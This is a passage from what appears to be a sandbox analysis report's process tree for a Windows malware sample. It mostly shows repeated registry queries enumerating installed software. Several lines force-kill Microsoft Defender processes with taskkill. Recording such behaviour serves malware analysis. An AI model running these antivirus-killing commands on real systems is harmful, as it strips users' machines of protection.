                                                                                                                                                                                                              "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                              PID:1860
                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:1692
                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:1856
                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:484
                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:2028
                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:64
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:1936
                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:32
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:524
                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:1940
                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:1700
                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:1480
                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:1560
                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:1892
                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:2012
                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:1888
                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:1944
                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:768
                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:1232
                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:64
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:1620
                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:32
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:740
                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:1628
                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:1648
                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:664
                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:1344
                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:1728
                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:904
                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:1984
                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:1908
                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:1492
                                                                                                                                                                                                                                                                  • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                    PID:1512
                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:1936
                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:1536
                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:1804
                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:1892
                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:112
                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:752
                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:768
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:1896
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:1496
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:1584
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:1648
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:1056
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:1856
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:904
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:1788
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:1908
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:524
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                          PID:680
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:1644
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:2016
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:1612
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:1676
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:1952
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:112
                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                    PID:1596
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:740
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                          PID:1812
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                            PID:1548
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:1788
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                PID:1492
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                  PID:856
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                  PID:1500
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                      PID:1700
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                        PID:1404
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                        PID:1860
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                            PID:2016
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                              PID:2012
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                              PID:752
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                  PID:112
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                    PID:1508
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                    PID:1812
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                        PID:2000
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                          PID:1932
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                          PID:1620
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                              PID:1656
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                PID:1492
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                              PID:796
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                PID:1700
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:1332
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:1944
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:112
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:64
                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:1548
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:32
                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:1972
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:1932
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:1800
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:524
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:1492
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:320
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:2012
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:1612
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:1480
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:1332
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:1508
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:1056
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:1972
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:1844
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:1656
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
